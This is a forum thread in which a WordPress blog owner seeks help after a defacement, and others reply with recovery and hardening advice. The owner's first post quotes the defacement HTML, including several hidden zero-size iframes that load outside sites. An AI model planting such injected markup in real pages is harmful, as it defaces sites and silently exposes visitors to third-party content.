I don't know why did he did it. This turkish hacker 'defaced' my news blog yesterday. Now all the 'categories in the blog disappear. All the posts now reverted to 'uncategorized' section. The worst thing - I can create new categories. Please help me Here is the code - left in the blog <div id="Layer1" style="position:absolute; left:0; top:0; width:1000; height:1000; z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000"> <strong><font color="#777777" face="Verdana" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>HACKED BY iskorpitx (Turkish Hacker)</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="../bcvb.css" rel="stylesheet" type="text/css"> </head> <body bgcolor="#000000" text="#FFFFFF"> <p align="center"> </p> <p align="center"> <img src="http://www.mavi1.org/forum/atam.gif" width="157" height="99"></p> <p align="center"><font size="5">BY iSKORPiTX; <BR> </font></p> <p align="center"><font size="5">(TURKISH HACKER)</font></p> <div align="center"> <table width="53%" border="1" align="center" bordercolor="#000000" bgcolor="#000000"> <tr> <td bgcolor="#000000"> </font> <font color="#777777" face="Verdana" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <p align="center"> </p> <p align="center"> </p> <p align="center"><font size="2" face="Arial, Courier, Haettenschweiler"> <br> </font></p> <p align="center"> </p> </td> </tr> <tr> <td height="64" background="HAcking"> <div align="center"> </div></td> </tr> </table> </div> </body> </html> <iframe src="http://www.mavi1.org" frameborder="0" width="0" height="0"></iframe> <iframe src="http://www.mavi1.org/forum" frameborder="0" width="0" height="0"></iframe> <iframe src="http://www.siyamiozkan.com.tr" frameborder="0" width="0" height="0"></iframe> <iframe src="http://www.crosswindchurch.com/kbd/" width="0" height="0"></iframe>
the .htaccess is still look as usual. No additional codes have been inserted. The server have been reformatted by my hosting co. The only problem now is all the categories disappear. I still have all the posts though. I have done clean install of wordpress 2.6.2, disable then delete all the plugins. Nothing changed
why don't you ask your hosting provider to restore your site from backup first, and then to install 2.6 wordpress ?
They did. The hacker came back and defaced the site again. The site were down more than 24 hours because of the 'silly' attack. Any other recommendation how to avoid site from being hacked especially wordpress. I've installed plugin that detect ip address. I hope it can help.
track down how he is doing it , look at raw logs .... not easy though. Best way is to find the exploit and fix it.
Find timestamps on the files that got modified, then check your access logs for who was requesting pages (or accessing the site by FTP) at the time of the attack. If you can find the attack in the logs, it will help you to discover how they got into the site. The URLs in the logs might show exactly how they executed the attack. If you were already using the latest WP version when the site was hacked, maybe there's yet another new vulnerability that hasn't been announced or patched yet. Why not switch to plain HTML pages and forget about WP? Here is the WP security report at Secunia: http://secunia.com/advisories/product/6745/?task=advisories
Make sure you upgradde your WP to the latest. I suggest backup your database and then remove all the files from your account. Reupload a complete new complete of WP! Yes, you must follow these steps. Because, i have found that hackers also upload some .php files to your account which you will never notice it.. --- joseph
i wud get better secruity on the server either apache or stuff its a bug so i wud suggest he like updatein and addin secruity patches to the apache
mmmm... an iframe injection hack. What other scripts do you have uploaded to your account. Maybe something long forgotten about ? Anything like a contact form, guestbook, or image gallery ? Prolly too late now (all those DP'rs have hit your link) I would look thru your logs or latest visitors and look for the very long URLS. That should point you to the vulnerable script. And the next time you have things all cleared up... it would be very wise to change all your account / script passwords.
Same thing happened to me today in 3 of my blogs (which are running from the same web host. I'm actually grateful since apparently the databases remain in place. Looks to me that the attack just messed around with the index.php from each blog. It will probably be a major pain in the ass restoring everything to normal, but still I guess it could have been worse.